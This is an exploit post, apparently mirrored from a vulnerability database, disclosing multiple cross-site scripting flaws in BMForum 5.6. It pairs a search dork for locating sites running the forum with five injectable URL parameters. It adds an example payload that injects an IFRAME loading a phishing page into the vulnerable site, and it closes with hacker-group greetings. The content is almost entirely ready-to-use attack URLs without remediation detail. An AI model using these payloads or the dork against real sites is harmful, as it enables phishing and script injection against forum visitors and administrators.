Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19887
HistoryMay 22, 2008 - 12:00 a.m.

BMForum Remote 5.6 Miltiple XSS Vulnerability

2008-05-2200:00:00
vulners.com
23

==========================================================
BMForum Remote 5.6 Miltiple XSS Vulnerability

AUTHOR : CWH Underground
DATE : 22 May 2008
SITE : www.citec.us

#####################################################
APPLICATION : BMForum
VERSION : 5.6 (Lastest Version)
VENDOR : http://downloads.sourceforge.net/bmforum
#####################################################

DORK: "powered by BMForum"

β€”Exploitβ€”

[-] http://[target]/[BBForum_path]/index.php?outpused=<XSS>
[-] http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?footer_copyright=<XSS>
[-] http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?verandproname=<XSS>
[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?topads=<XSS>
[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?myplugin=<XSS>

β€” Note β€”
Very Dangerous for using 'IFRAME' TAG for Phishing Techniques

Example: http://[target]/[BBForum_path]/index.php?outpused=<IFRAME src=http://phisherpage.com width="900" height="600">

##################################################################

Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C

##################################################################